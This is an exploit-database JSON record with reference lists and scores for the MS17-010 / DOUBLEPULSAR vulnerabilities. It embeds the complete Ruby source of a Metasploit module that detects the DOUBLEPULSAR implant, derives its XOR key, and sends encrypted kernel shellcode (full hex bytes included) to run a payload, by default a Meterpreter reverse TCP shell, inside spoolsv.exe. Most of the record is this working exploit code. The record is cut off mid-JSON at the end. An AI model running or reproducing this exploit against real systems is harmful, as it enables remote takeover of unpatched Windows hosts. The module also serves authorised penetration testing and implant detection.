{"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:22:06", "differentElements": ["sourceData"], "edition": 39}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "06492ccaa33874b49c69fb33b7c1927d", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-11T00:22:25", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", 
"1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", 